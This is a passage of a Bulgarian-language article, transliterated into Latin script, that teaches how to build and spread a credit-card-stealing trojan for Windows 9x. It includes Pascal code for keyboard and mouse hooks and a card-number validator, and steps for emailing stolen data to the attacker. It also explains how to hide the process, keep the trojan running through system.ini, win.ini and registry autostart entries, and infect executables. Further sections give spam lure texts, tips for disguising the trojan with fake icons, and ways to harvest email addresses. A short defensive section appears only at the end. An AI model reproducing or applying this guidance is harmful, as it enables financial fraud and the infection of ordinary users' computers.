sposobnosti. Pri nego ne sa nuzhni nito hakerski sposobnosti, nito niakakvi
genialni programistski umenia, a uspehut mu v sravnenie s drugite metodi e
mnogo goliam, vupreki che se postiga sravnitelno lesno. Eto zashto
po-natatuk shte iziasnim v detaili imenno tozi metod - fishvaneto na karti
chrez troianki kone. Troianskite kone predstavliavat programi, koito se
instalirat na kompiutura na zhertvata i se izpolzvat za da go manipulirat,
za da izvlichat ili unishtozhavat informacia ili prosto za da mu suzdavat
problemi. Za razlika ot kompiuturnite virusi, troianskite kone ne se
samorazprostraniavat. Tiahnata funkcia e da proniknat v kompiutura na
zhertvata i da svurshat niakakva polezna rabota za tozi, koito gi izpolzva.
Osven tova troianskite kone obiknoveno dobre se skrivat v operacionnata
sistema (poniakoga da zhe stavat chast ot neia), za da ne budat zabeliazani
i otstraneni. Te si vurshat rabotata napulno nezabeliazano ot potrebitelite.
Ima niakolko nachina edin troianski kon da izvleche kartata na zhertvata.
Ediniat e da pretursi diskovite ustroistva za failove s kreditni karti.
Vtoriat e da zapisva vsichko, koeto potrebiteliat-zhertva pechata na
klaviaturata, a tretiat e da prihvashta informaciata za kartite v momenta, v
koito tia se populva niakude. Osnovniat problem i pri trite nachina e da se
izvleche ot kupa nenuzhna informacia samo poleznata. Purviat nachin postiga
mnogo slabi rezultati, zashtoto pochti nikoi ne si durzhi kartat a vuv
failove po diska. Pri vtoria nachin e mnogo trudno da se otsee poleznata ot
nepoleznata informacia i sushto e slabo rezultaten, zashtoto obiknovenite
horata pishat stotici neshta vseki den. Tretiat nachin se naricha
"CC-fishing" ili "fishvane na kr editni karti" i pokazva izkliuchitelno
visoki rezultati. Toi se bazira na ideiata za prihvashtane na kartite v
momenta, v koito potrebiteliat gi izpolzva, po vreme na izvurshvane na
elektronni plashtania po INTERNET. Predimstvata na pridobitite po tozi n
achin karti sa niakolko. Kartata, koiato pridobivame se izpolzva v INTERNET
za plashtania i zatova bankata shte razreshava i na vseki drug da plashta
on-line s neia, t.e. kartata e validna i raboteshta. Chovekut, na kogoto e
kartata obiknoveno e mnogo da leko e nepoznat. Tova namaliava shansovete da
si imate problemi sled zloupotrebata s neia. Vse pak ako pazaruvate s
kartata na suseda vi i toi razbere, niama da e mnogo veselo...
Opisano nai-nakratko metodut za fishvane na karti se sustoi v slednoto: Na
kompiutura na zhertvata po niakakuv nachin se instalira troianski kon. Tozi
kon sledi postoianno poletata na aktivnia prozorec i kogato v niakoe ot tiah
zabelezhi validen nomer na kreditna karta, izprashta po e-mail-a
informaciata ot celia aktiven prozorec na hakera (suzdatelia na troianskia
kon). Taka se prihvashtat pochti vsichki on-line plashtania, koito izvurshva
zhertvata, nezavisimo dali go pravi prez WEB-brauzur ili s drug softuer.
Obiknoveno cialata informacia za kartata se namira v tozi prozorec i ako ia
prihvanem, e mnogo veroiatno da sme se sdobili s tursenata informaciata -
kartata na zhertvata. Za da razberem dali v niakoe pole ot aktivnia v
momenta prozorec ima nomer na kreditna karta, mozhem da izpolzvame edna
hitra strategia - da analizirame vsichki poleta i da vidim dali dannite
niakude otgovariat na nomer na kreditna karta. Ako imame pole, koeto se
sustoi samo ot cifri, intervali i tireta, sled kato mahnem tiretata,
mozhem da proverim dali poleto sudurzha validen nomer. Tova stava purvo kato
proverim dali dulzhinata na chisloto e tolkova cifri, kolkoto triabva (za
VISA - 13 ili 16, za MasterCard - 16 i t.n.). Kato se ima predvid, che
poslednata cifra v nomera ta na kartite e specialna kontrolna suma, triabva
da izchislim kontrolnata suma na vsichki cifri bez poslednata i da ia
sravnim s neia. Algoritumut za tazi kontrolna suma e izvesten. Ako i broiat
cifri i kontrolnata suma suvpadnat, to e pochti sigurno, c he potrebiteliat
e vuvel kreditna karta v WEB-brauzura ili niakoia druga programa, koiato toi
izpolzva za plashtania. Dostatuchno e da zapishem celia aktiven prozorec v
niakakuv fail ili puk samo vsichkite mu poleta ili chast ot tiah i sled tova
si da izpratim tozi fail po e-mail-a i da go iztriem. Razbira se, e
zadulzhitelno da go kodirame, makar i po niakakuv elementaren nachin, za da
ni hvashtat po trudno i za da ne ni kradat otkradnatite karti chrez
podslushvane na tarfika po mrezhata.
Da poglednem na neshtata ot programistska gledna tochka. Kak da napishem
troianski kon za fishvane na kreditni karti? Troianski kone, koito rabotiat
po opisania mehanizum mogat da se napishat za proizvolna operacionna
sistema, no nie shte nablegnem na WINDOWS 95/98/NT, poradi niakolko
predimstva: Tova e nai-populiarnata operacionna sistema, razprostranena po
milioni kompiutri po sveta, koiato se izpolzva ot masovia potrebitel, koito
pochti vinagi ne razbira mnogo ot kompiutri. Takiva potrebiteli, se narichat
lammer-i i sa osnovnite zhertvi na CC-fishinga s troianski kone. Nashata cel
e da napishem troianski kon, koito da prihwashta kreditnite karti ot
programite, raboteshto pod upravlenieto na WINDOWS. Ezikut za
programirane, koito shte izpolzvame ne e ot znachenie. Vse pak nie shte
izpolzvame Borland Pascal 7.0. V tazi statia ne smiatame da publikuvame
pulniat sors kod na troianski kon za karti, a samo da dadem osnovnite nasoki
za razrabotka.
Za prihvashtaneto na sudurzhanieto na tekushtia prozorec mozhem da
izpolzvame mnogo metodi. Edin ot tiah e prez opredelen interval ot vreme da
skanirame vsichki poleta na aktivnia prozorec za validen nomer na karta.
Po-efektiven e obache drugiat podhod - da izvurshvame takova skanirane samo
pri klikvane s mishkata ili pri natiskane na klavisha [Enter]. Tozi podhod e
po-umen, zashtoto obiknoveno potrebiteliat natiska [Enter] kogato e populnil
informaciata si i e gotov da ia izprati. Postoiannoto skanirane bi moglo da
zabavi sistemata. Pri nashia nachin takova skanirane shte se izvurshva mnogo
po-riadko. Preporuchitelno e da se napishe efektiven kod za tursene na karti
po tekushtia prozorec. Prihvashtaneto na sistemnite subitia v WINDOWS -
klikvane s mishka i natiskane na klavish mozhe da se izvurshi chrez sistemni
funkcii za HOOK-vane na subitia po slednia nachin:
SetWindowsHOOK(WH_KEYBOARD, MakeProcedureInstance(@MyKeyboardProc,hInstance));
SetWindowsHOOK(WH_MOUSE, MakeProcedureInstance(@MyMouseProc,hInstance));
kudeto funkciite MyKeyboardProc i MyMouseProc sa definirani kakto e opisano
v dokumentaciata. Te mogat da sa naprimer neshto podobno na:
Function MyKeybHookProc(Code:integer; w:word; l:longint): longint;
EXPORT;
Begin
MyKeybHookProc:= DefHookProc(Code,w,l,OldKeybHOOK);
if (l and (1 shl 31) <> (1 shl 31)) then
if w = vk_RETURN then
EnumChildWindows(GetActiveWindow,@ProcessCurrentWindow,0);
End;
kudeto funkciata ProcessCurrentWindow skanira za validni nomera na karti
zadadenia i kato parametur prozorec. Edna takava procedura mozhe da
izglezhda naprimer po slednia nachin:
Function ProcessCurrentWindow(WND:HWnd;l:longint): boolean; export;
Const Next = false;
Prev = true;
Var Field: HWnd;
S: PChar;
aText: string;
Function GetFieldText: string;
Begin
if (Field=0) or
(SendMessage(Field,WM_GETTEXT,255,longint(S))=0) then
GetFieldText:=''
else GetFieldText:=StrPas(S);
End;
Procedure NextField(NextPrev:boolean);
Var F: HWnd;
Begin
F:=GetNextDlgTabItem(WND,Field,NextPrev);
if F = Field then Field:=0 else Field:=F;
End;
Function FindCC: boolean;
Var Counter: integer;
Begin
Field:=0; Counter:=0;
repeat
aText:=GetFieldText;
if ValidCC(aText) then
begin FindCC:=true; Exit; end;
NextField(Next); Inc(Counter);
until (Field = 0) or (Counter > 128);
FindCC:=false;
End;
BEGIN
ProcessCurrentWindow:=true;
if FindCC then
begin
<<GetCC>>; {Vzema kartata - naprimer vsichki poleta ot prozoreca}
<<WriteTheCCToFile>>; {Kodira informaciata i ia zapisva vuv fail}
<<TryToSendTheFileToYourEMail>>; {Puska mehanizma za izprashtaneto na
faila s kartata. Obiknoveno izprashtaneto stava ot glavnata programa }
end;
END;
Posochenata funkcia suvsem ne pretendira za optimalnost ili krasota na
realizaciata, no vse pak vurshi dobra rabota. Ne zabraviaite da slozhite
tazi funkcia v otdelen .DLL fail, zashtoto ima opastnost sistemata vi za
zavisne ili prosto programata da ne raboti. Napravete spravka s
dokumentaciata. Obiknoveno procedurite, obrabotvashti HOOK-ove triabva da sa
v .DLL. Funkciata, koiato vrushta dali edin simvolen niz e validen nomer na
karta e edna ot nai-vazhnite:
Function ValidCC(const Card:string): boolean;
Var CheckSum,i,digit,PozL,PozR: integer;
CC: string;
C: array[0..255] of byte absolute CC;
Begin
{ --- Extract all digits from Card to CC --- }
CC:=''; PozL:=1; PozR:=length(Card);
for PozL:= 1 to length(Card) do
if (Card[PozL]>='0') and (Card[PozL]<='9') then Break;
for i:= PozL to length(Card) do
if Card[i] in['-',' '] then
Continue {Only ' ' and '-' can appear between digits}
else if (Card[i]>='0') and (Card[i]<='9') then
begin CC:= CC + Card[i]; PozR:=i; end
else Break;
{ --- Check if extracted number can be CC --- }
ValidCC:=false;
if (PozL > 1) and (Card[PozL-1] <> ' ') then
Exit; {The card must have ' ' or nothing else before
its digits}
if (PozR < length(Card)) and
(not(Card[PozR+1] in [' ',',',#10,#13])) then
Exit; {The card must have ' ', ',' or nothing else after its
digits}
if CC[1] = '3' then {AmericanExpress, DinnersClub - 14, 15 digit}
if (C[0] <> 15) and (C[0] <> 14) then Exit;
if CC[1] = '4' then {VISA - must be 13 or 16 digit}
if (C[0] <> 13) and (C[0] <> 16) then Exit;
if CC[1] = '5' then {MasterCard - must be 16 digit}
if C[0] <> 16 then Exit;
if CC[1] = '6' then {Discover Card - must be 16 digit}
if C[0] <> 16 then Exit;
if CC[1] in ['0','1','2','7','8','9'] then
Exit; {No known credit card begins with such digit}
{ --- Calculate credit card check sum --- }
CheckSum:= 0;
for i:= 1 to C[0]-1 do
begin
digit:= C[i] - 48;
if odd(i+C[0]) then digit:= digit shl 1;
if digit >= 10 then Dec(digit,9);
Inc(CheckSum,digit);
end;
CheckSum:= (10-(CheckSum mod 10)) mod 10;
{Return if card is valid /last digit=checksum/}
ValidCC:= (C[C[0]]-48 = CheckSum);
End;
Tazi funkcia e mnogo vazhna i sushtestvena. Variantut, v koito vi ia
predlagame e pochti idealen, zashtoto e izpitan napraktika i pokazva mnogo
dobri rezultati. Predstavete si samo kakvo bi stanalo ako dopusnete greshka
v tazi funkcia? Az naprimer proveriavah nepravilno kontrolnata suma v edna
ot starite versii i si prepulnih poshtenskata kutia s vsiakakvi pisma, koito
na programata i prilichaha na karti (a na mene mi prilichaha na
bezsmislici).
Procedura za izprashtane na e-mail niama da vi davam. Povecheto sredi za
razrabotka pod WINDOWS si imat sobstveni sredstva za izprashtane na poshta.
Ot vsevuzmozhni mesta v INTERNET mozhete da izteglite sorsove na C i na
DELPHI ili puk mozhete da si napishete neshto sobstveno. Vse pak mozhete da
si izteglite hubavi biblioteki za e-mail ot
http://www.rtfm.be/fpiette.
Troianskiat kon triabva da sledi postoianno za karti i da gi ulavia. Kogato
e ulovil karta, triabva da sledi za vruzka s INTERNET i kato se poiavi
niakakva takava vruzka da izprati kartata po e-mail-a na kogoto triabva.
Problemut da se proveri dali ima vruzka s INTERNET e lesno reshim. Mozhem
prosto da se opitvame prez 5 minuti da izprashtame pismoto i ako niamame
vruzka s INTERNET, to funkciata za izprashtane na e-mail shte ni vrushta
greshka, koeto oznachava, che sled 5 minuti triabva otnovo da probvame da
izpratim pismoto, dokato nakraia ucelim podhodiashtia moment. Razbira se,
ima i drugi nachini za ustanoviavane dali ima vruzka s INTERNET.
Izprashtaneto na pismoto s kartata mozhem da osushtestvim prez niakoi
publichen SMTP server ili napravo prez SMTP server-a, na koito ni e
poshtenskata kutia. Mozhem sushto da vzemem SMTP server-a ot standartnia
e-mail klient na zhertvata (Eudora, Outlook Express i t.n.) i da izpolzvame
nego. Taka nashiat kon shte raboti dazhe i kogato zhertvata polzva INTERNET
prez PROXY server i niama direktna vruzka. Izborut na izprashtasht SMTP
server e sushtestven moment.
Skrivaneto na troianskia kon e drugiat problem, koito triabva da se
preodoliava. Ako koniat vi e .EXE fail, skrivaneto mu v pametta mozhe da
stane s funkciata:
RegisterServiceProcess(0,1);
Procedure RegisterServiceProcess(Process:longint;State:longint);
far; external 'KERNEL';
Tazi funkcia skriva tekushtia proces ot spisuka, koito se poiaviava pri
natiskane na [Ctrl-Alt-Del] (Task List). Vnimavaite s tazi funkcia! V
WINDOWS NT tia ne sushtestvuva. Zatova e dobre e da ia vikate dinamichno.
Drug metod za skrivane na proces e danapishete celia kod na konia v edin
.DLL fail. Sled kato izvikate tozi .DLL i ot nego slozhite sistemen HOOK,
tozi .DLL shte ostane rezidenten i niama da se mahne ot pametta sled
spiraneto na .EXE faila. Taka niama da imate rezidenten proces, no shte
imate aktiven rezidenten .DLL, koito shte vurshi cialata rabota.
Potrebiteliat niama da mozhe da vidi che ima troianski kon. Tozi metod e za
predpochitane.
Ima oshte edin seriozen problem otnasiasht se do skrivaneto na konia.
Ponezhe koniat triabva da e postoianno aktiven, e nai-dobre toi da se puska
sus zarezhdaneto na operacionnata sitema. Nai-lesniat nachin e da slozhim
konia v sekciata [windows] na faila WIN.INI "run=trojan_horse.exe" i pri
zarezhdane na Windows nashiat troianec shte se puska avtomatichno.
(Bel.Iron - Ima oshte edin mnogo hitur nachin, s koito se sbluskah
naskoro... pravi se slednata shashma: v SYSTEM.INI, v sekciata boot, shell
poleto se zamenia sus slednoto:
shell=explorer.exe troianec.exe
Windows startira i dvete exe-ta. I, koeto e po-interesnoto, vseki put,
kogato potrebiteliat se opita da pusne Windows Explorer, shte se puska i
kopie na troiancheto:-)
Drug sushto lesen podhod e da dobavim stonost v registry-to. Naprimer mozhem
da dobavim stoinostta "trojan_horse.exe" v kliucha
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run". Efektut
e otnovo avtomatichno izpulnenie na troianeca. Triabva da se otbelezhi, che
nai-podhodiashtite direktorii, v koito triabva da se instalirat troianskite
kone - "WINDOWS\SYSTEM\". V tozi sluchai nikude v programata, nito v
registry-to, ne triabva da se zadavat putishta do failovete na konia. Osven
tova v tezi direktori vinagi ima ogromno kolichestvo failove i veroiatnostta
potrebiteliat da se osumni, che niakoi ot tiah e troianec, e tvurde malka.
Ima i drugi kliuchove v registry-to, koito mogat da se izpolzvat za
avtomatichno startirane na programi pri zarezhdane na operacionnata sistema.
Ima e edin fail s ime "WINSTART.BAT", koito se izpulniava pri zarezhdane na
WINDOWS. Mozhem da slozhim nashiat kon i napravo v StartUp grupata na
Start Menu-to, no tova e tvurde naivno. Vsichkite posocheni dosega metodi sa
neefektivni, zashtoto dazhe nai-obiknoveniat potrebitel mozhe da razbere,
che sistemata zarezhda niakakuv troianec avtomatichno. Tova mozhe da stane s
razlichni programki, vkliuchitelno i s MsConfig i DrWatson, koito sa
standartna chast ot Windows 98. Eto zashto triabva da zarezhdame nashiat
troianski kon po po-hitur i nezabelezhim nachin. V niakoi kliuchove ot
registry-to, kakto i v niakoi sekcii na konfiguracionnite failove WIN.INI i
SYSTEM.INI ima vuzmozhnost za zarezhdane na razlichni draiveri i .DLL-i.
Mozhem da napravim programka za zarezhdane na konia, koiato predstavliava
draiver ili .DLL i da ia instalirame na niakoe ot posochenite mesta. Ako puk
nashiat troianec e .VXD draiver, mozhem prosto da go kopirame s podhodiashto
ime v sistemnata direktoria na WINDOWS i toi shte se pusne ot operacionnata
sistema. Ako celiat nash troianec niama .EXE fail, a e prosto .DLL, mozhem
sushto da go zaredim ot niakude nezabeliazano. Shte dadem edin primer kak
stava tova. Neka imame faila ADVAPI.DLL, koito se poluchava ot sled
kompilirane na slednata programka:
LIBRARY ADVAPI;
USES WinTypes, WinProcs;
BEGIN WinEXEC('TROJAN_HORSE.EXE',SW_HIDE); END.
Imeto na faila e specialno podbrano, za zabluda na protivnika. Dobre e da
slagame imena, koito sa shodni sus sistemnite failove i moduli na
operacionnata sistema. Ako dobavim v sekciata [BOOT] na faila SYSTEM.INI
DRIVERS = ADVAPI.DLL
ADVAPI.DLL shte se zarezhda avtomatichno oshte predi zarezhdaneto na
Desktop-a i Shell-a na WINDOWS (Windows Explorer). I ponezhe ADVAPI.DLL
puska nashiat troianec, toi vinagi shte se zarezhda ot WINDOWS i to suvsem
skrito.
Vnimanie: Ne dopuskaite bug-ove v troianskite kone! Te mogat da vi razkriat.
Sluchvalo se e poradi greshki v programnia kod na kone da se zabavi
znachitelno operacionnata sistema, da stane nevuzmozhno Shut-Down-vaneto i
ili puk po vreme na rabota da dava General Exception Fault ili WINDOWS da
blokira, koeto nikak ne e priatno. Zatova vinagi testvaite troianskite si
kone na razlichni kompiutri i operacionni sistemi, rabotete produlzhitelno
vreme s troianci v pametta i t.n., za da ste sigurni, che v tiah niama
greshki.
Drug hitur metod za skrivane na troianec e da zarazite s nego niakoi
izpulnim fail (.EXE ili .DLL). Ideiata e da smenite imeto na originalnia
fail, da zapishete troianeca na negovo miasto s negovoto ime, a pri vikane
na troianeca da vikate originalnia fail. Po tozi nachin potrebiteliat niama
da razbere nishto, a vseki put, kogato toi izpolzva zarazeniat fail, shte se
izpulniava i vashiat troianec. Mozhete da zarazite niakoi ot failovete na
Dial-Up Networking-a ili Internet Explorer ili niakoi ot sistemnite failove
na WINDOWS. Osnoven problem pri tozi podhod e, che kogato edin fail e
aktiven v pametta, toi ne mozhe da bude prezapisan. Eto zashto ili triabva
da zaraziavate neaktivni v pametta failove ili triabva da gi zaraziavate po
specialen nachin, naprimer chrez malka programka-zarazitel, koiato se
izpulniava pri zarezhdaneto na WINDOWS. Mozhete da izpolzvate i faila
WINSTART.BAT, koito se izpulniava pri vsiako startirane na WINDOWS.
Otnosno skrivaneto ima i oshte neshto. Povecheto komponenti na operacionnata
sistema imat specialen resurs, narechen VERSION_INFO. Toi sudurzha
informacia otnosno prizvoditelia na faila, ot kakvo e chast toi, suvsem
kratko opisanie i nomer na versiata. Dobre e i v konete koito pishete da
slagate takiva resursi. Mozhete da gi suzdadete s razlichni programi,
naprimer s Borland Resource Workshop. Osven tova niakoi programi imat
specifichni ikoni. Interesno se poluchava, kogato slozhite ikonka na .ZIP
fail kato ikonka za .EXE faila, koito instalira vashia troianec. Mnogo
potrebiteli se zabluzhdavat, che tozi fail e .ZIP arhiv i go otvariat.
Estestveno e vashata programka da dade niakakva greshka sled kato instalira
konia i v tozi sluchai potrebiteliat izobshto da ne razbere kakvo se e
sluchilo.
Eto che stigniahme do sledvashtiat vupros - za razprostranenieto na konia za
karti. Ochevidno kolkoto poveche hora imat aktiven troianskia kon za karti v
pametta na kompiutura si, tolkova poveche kreditni karti shte poluchavate.
Eto zashto koniat triabva da se razprostrani po mnogo kompiutri, i nai-veche
po takiva, koito se izpolzvat za elektronni razplashtania (pazaruvane po
INTERNET). Osven tova triabva da se zaraziat nai-veche kompiutrite na
obiknovenite potrebiteli, zashtoto edin dobur kompiuturen specialist nikoga
niama da dopusne da se zarazi s troianski kon. Naprotiv, mnogo e veroiatno
koniat da bude izpraten do sluzhbite za borba s kompiuturnite virusi i
suvsem skoro da izleze antivirusna programa sreshtu nego. Niakoi ot moite
troianki kone naprimer se chistiat ot F-PROT i AVP. Vupreki, che niama kak
da razberem koi shte poluchi nashiat troianki kon, ako go razprostraniavame
sus SPAM ili po drug nachin na sluchaini hora, vse pak mozhem da predpriemem
niakakvi merki, s koito da ogranichim "zaribiavaneto" na po-umnite
potrebiteli. Edin osnoven nachin za razprostranenie e masovoto izprashtane
po poshtata. Mozhem da suberem malko e-mail adresi i da im izpratim po
niakoe pismo sus slednoto sudurzhanie, naprimer:
"Hi, do you remember me? I am Elena. I send you my photo".
ili
"Hi. Look at the file we talked about. Peter".
i razbira se dobaviame troianskia kon kum pismoto. Dosta e veroiatno da go
pusnat. Dobre e koniat da dava niakakva greshka pri otvarianeto na faila, za
da se zabludi neopitnia potrebitel. Drug nachin za razprostranenie e da
slozhim konia v niakoia hubava programka na niakoia stranica i da spam-vame
po e-mail ili v IRC (koeto e mnogo intersno). Naprimer mozhem da vlezem v
kanala #mp3 i da kazhem, che predlagame novia album na niakoia grupa
bezplatno, kato dadem stranicata s konia. V tozi sluchai e dobre koniat da e
.EXE, no s ikonka na .MP3 fail. Oshte po-dobra ideia e da spam-vame za da
imame posshtenie na nashata stranica ili prosto da ia reklamirame kato si
platim niakude za celta s kreditna karta, da ia slozhim dosta luzhlivi
neshta za download, koito razbira se sa ili troianci, ili niakakvi
troianizirani programki. Mozhem da napishem dazhe niakakva ActiveX kontrola
s troianec v neia i ako potrebiteliat izpolzva Microsoft Internet Explorer,
mozhe da se zarazi dazhe i bez da razbere ili samo kato se suglasi da
izdurpa "neobhodimata za rabota" ActiveX kontrola. Osven tova mozhem da se
vuzpolzvame ot obshtoizvestnite bugove v Internet Explorer, naprimer
vuzmozhnostta za pisane v lokalnia hard-disk i po registry-to.
Vse pak edin ot nai-efektivnite nachini za momenta e "zaribiavaneto" po
e-mail. Za da zaribiavate po elektronnatata poshta, obache vi triabvat
goliamo kolichestvo adresi. Edin ot nachinite za sdobivane s e-mail-i e da
si napishite skript, koito tursi v niakoia mashina za tursene na adresi v
INTERNET, kato naprimer http://www.switchboard.com. Drug nachin, koito e
dosta po-lesen e da otidete v podhodiashta mashina za tursene v INTERNET i
da dadete niakakva zaiavka ot tipa na:
"@hotmail.com" + "@yahoo.com" + "@mailcity.com" + "@usa.net"
Mozhete da dobavite kum zaiavkata i izrazite "e-mail directory" ili
"guestbook" i shte poluchite edin mnogo goliam spisuk ot stranici, v koito
ima desetki, stotici, a poniakoga dori hiliadi e-mail adresi na sluchaini
hora. Dostatuchno e da si zapishete vsichkite tezi stranici v edna
direktoria i sled kato suberete dostatuchno kolichestvo megabaiti sus
stranici s e-mail-i, da si napishte edna programka, koiato izvazhda ot HTML
ili tekstovi dokumenti validnite e-mail adresi. Mozhete da si izmislite
niakakuv sintaksis, po koito da razpoznavate e-mail-ite v teksta. Naprimer
vseki e-mail ima formata <ime>@<survur>.<survur>.....<domein>. Ot svoia
strana <ime> mozhe da e suvkupnost ot bukvi, cifri i niakoi drugi simvoli,
<survur> e suvkupnost ot latinski bukvi i cifri, a <domain> e 2 ili 3
latinski bukvi. Osven programkata za izvazhdane na e-mail-i, shte vi
triabvat i oshte niakolko programki, naprimer za sortirane na e-mail-ite, za
premahvane na ednakvite, za razburkvane v proizvolen red i t.n. Tezi
programki sa prosti i mozhete sami da si gi napishete. Shte vi triabva
zadulzhitelno i programa za prashtane na e-mail, zashtoto povecheto
standartni programi za izprashtane na e-mail ne skrivat poluchatelite. Osven
tova izprashtaneto na 100 000 konia po celia sviat nikak ne e lesna rabota!
Triabva vi burza i kachestvena INTERNET vruzka. Triabva vi hubava programka
za prashtane na e-mail, koiato raboti paralelno, zashtoto povecheto e-mail
klienti izprashtat pismata edno po-edno kato izpolzvat nai-mnogo 10% ot
kapaciteta na vruzkata. Tova se dulzhi na protokola za izprashtane na
poshta. Mozhete da izpolzvate Star Gruhtar Mass Mailer ili da si napishete
sobstvena e-mail razprashtachka. Dosta dobra ideia e sushto da se prashta ot
Shell-account ili ot niakakva UNIX/LINUX mashina. Povecheto softuer za
poshta pod UNIX sistemite (kato SendMail i QMail) raboti mnogo efektivno.
Drug problem e prez koi SMTP server da se prashta. Nai-dobre e da se prashta
prez niakolko moshtni publichni (priemashti poshta ot vseki za vseki) SMTP
server-i. Takiva survuri mozhem da otkriem sus skaner za SMTP
mail-server-i ili ot niakoi spisuk v INTERNET. Pri izprashtane na goliamo
kolichestvo poshta mozhe da se sluchi ako izpolzvaniat survur ne s
dostatuchno burza vruzka ili e mnogo natovaren, pismata da se izpratiat
uspeshno, no da ne pristignat. Tova vazhi osobeno silno ako koniat e s
goliam razmer. Zatova triabva da se izpolzvat mnogo survuri. Osven tova
administratorite na survurite sushto mogat da zabraniat poshtata. Eto zashto
kogato spam-vate triabva da slagate niakoi vash e-mail ot vreme na vreme
sred golemia spisuk za da proveriavate dali pismata se poluchavat ot
"vashite klienti".
Cialata sistema za dobivane na kreditni karti chrez troianski kone, koiato
opisahme do tozi moment ima i niakoi nedostatuci. Naprimer mozhe da
poluchite edna i sushta karta mnogo puti. Tozi problem mozhe da se reshi
kato troianskiat kon si pravi spisuk ot veche izpratenite karti, no tova ne
e mnogo dobre da stava, zashtoto ima oshte edin mnogo po-strashen problem.
Mnogo chesto (v poveche ot 70% ot pismata) se poluchavat karti s nepulna
informacia. Tova se dulzhi na razlichni prichini kato naprimer: Magazinut,
kudeto e pazaruval "klientut" iziskva samo nomer na kartata ili samo nomer i
exp.date, koeto suvsem ne e dostatuchno na povecheto mesta. V niakoi sluchai
"klientut" si vuvezhda imeto i adresa na edna stranica, a plashtaneto se
izvurshva na druga, kudeto se vuvezhda samo nomera na kartata i datata na
iztichane. Ponezhe nashiat troianski kon hvashta samo aktivnata stranica,
toi izpuska vazhna informacia - ime i adres. Tozi problem mozhe da se reshi
kato se izprashtat ne samo dannite ot stranicata s kartata, no sushto i ot
predhodnata stranica. Vse pak i tova ne e lesno. Chesto edin potrebitel cuka
mnogo puti s mishkata dokato si populni formata s kartata. Ako fisherut za
karti izprashta po edin e-mail za vsiako cukvane, niakoi pisma se poluchavat
po mnogo puti, no populneni do razlichna stepen. Edin dobur nachin da se
izbegne tozi efekt e da se izprashta pismoto edva sled kato v tekushtia
prozorec veche niama validen nomer na karta, sled kato v prednia moment e
imalo. Taka shte sme sigurni, che shte izpratim samo populnenata dokrai
forma s kartata, a ne mezhdinnite danni po vreme na populvane. V tozi
sluchai, obache shte ima problem ako "klientut" prevkliuchi mezhdu razlichni
prozorci, no i tova mozhe da se predvidi. Dobre e da se zapisva i URL-to ako
formata e niakude vuv WEB. Chesto se sluchva dannite da se populvat ne s
cifri, a s drugi kontroli - naprimer RadioButton-i i Check-Box-ove. Togava
prihvashtaneto se zatrudniava i chesto fisherite propuskat chast ot
informaciata. Edno spasenie ot tazi situacia e da se izprashta cialata
stranica kato kartinka, no tova ne e preporuchitelno, zashtoto pismata shte
sa golemi i informaciata ot tiah shte se vadi trudno. V edin prakticheski
sluchai v nachaloto sled zaribavaneto na 30 000 choveka po e-mail v niakoi
dni se poluchavaha po nad 200 pisma. Pomislete kakvo shte stane ako vsiako e
po 50-100 KB. Ami ako niamate vuzmozhnost da si durpate "rekoltata" vseki
den... Druga ideia e pri vsiako klikvane s mishkata ili natiskane na [Enter]
da se zapisva informaciata ot tekushtata i predhodnata stranica vuv fail
zaedno s etiketite na poletata za vuvezhdane i da se izprashta failut v
momenta, kogato toi stane nai-goliam. Taka shte se prihvane maksimalno
kolichestvo informacia.
Drug mnogo osnoven nedostatuk na opisania v nastoiashtata statia fisher za
karti e che ne raboti pod niakoi versii na Internet Explorer (4.0 i 5.0).
Tova se dulzhi na fakta, che tezi web-browser-i ne izpolzvat standartnite
WINDOWS kontroli, a izpolzvat samo ActiveX kontroli. Tova oznachava, che
kartata ne se sudurzha v niakoe tekstovo pole, a v niakakva ActiveX
kontrola. Po vuprosa se raboti i veche se poiaviha niakoi fisheri za karti i
za Internet Explorer, koito izpolzvat COM interfeisite na IE i izvazhdat
nuzhnata informacia ot formata. Neshto poveche, IE poddurzha specialen event
OnBeforeNavigate, koito se vika kogato formata e veche napulno populnena i
potrebiteliat ia potvurzhdava. Ako se prihvane tova subitie, se reshavat
lesno i sigurno mnogo ot problemite, otpada sledeneto na mishkata i
klaviaturata i t.n.
Drug hitur i interesen nachin za fishvane na karti e da se prihvane modulut
na web-brauzura, koito se grizhi za izprashtaneto na kodirana informacia.
Stava vupros za HTTPS protokola, koito izpolzva SSL (Secure Socket Layer) za
izprashtane na kodirana informacia. Kak e realiziran i kak raboti SSL ne e
vazhno, no e vazhno, che modulut, koito go poddurzha (obiknoveno niakoi DLL)
poluchava v normalen nekodiran vid informaciata, koiato triabva da se
izprati kodirana. Tazi informacia obiknoveno e ot vida:
"https://www.shop.com/order.cgi?NAME=familia&SURNAME=ime&CARDTYPE=tip&CC=nomer&EXP=data...".
Tozi niz e vsichko, koeto ni triabva. Brauzurut go generira ot populnenata
forma i go podava kato parametur na modula za kodirano izprashtane po HTTPS
protokola. Ako zarazim ili promenim tozi modul, mozhem da si reshim
kachestveno vsichki problemi. Za suzhalenie tazi ideia oshte ne e izsledvana
zadulbocheno i po vuprosa ne mozhem da kazhem nishto po-konkretno.
Do tuk ragledahme kakvo predstavliavat konete za karti, kak se pishat i kak
se razprostraniavat. Da razgledame i kak mozhem da se predpazim da ne stanem
zhertva na troianski kon, popadnal po niakakuv nachin na kompiutura ni.
Nai-sigurnia metod e po nikakuv povod da ne vuvezhdame nomera na karatata si
v kompiutura. Obiknoveno mozhem da go izpratim po faks-a ili po drug nachin,
no ne i po kompiuturen put. Zabelezhete, che konete, koito sa opisani v tazi
statia izmukvat kreditnite karti, vupreki che te se prenasiat kodirani po
INTERNET (po protokola za HTTPS vruzka - chrez Secure Socket Layer). Nashite
kone ne podslushvat trafika po mrezhata i ne pronikvat v banki i magazini.
Te podsluzhvat mashinata na "klienta". Vtoroto, koeto vazhi ne samo za
fisherite za karti, no i izobshto za konete e da si proveriavame ot vreme na
vreme aktivnite procesi, kato otstraniavame nenuzhnite. Mozhem da ustanovim
nalichie na troianski kon mnogo lesno chrez programata DrWatson na Windows
98. Tia dava mnogo bogata informacia za zaredenite procesi, moduli i
draiveri, kakto i za prihvanatite sistemni HOOK-ove. Eto zashto ako vidim
che niakoi sumnitelen proces e prihvanal sistemen HOOK, triabva vnimatelno
da go izsledvame i ako ustanovim, che ne e chast ot instalirania na
kompiutura softuer, da go premahnem. Povecheto programi za kirilizacia
prihvashtat sistemnite HOOK-ove na klaviaturata, taka che vnimavaite.
Razbira se lipsata na HOOK-ove ne ni garantira che niamame kon. Ne triabva
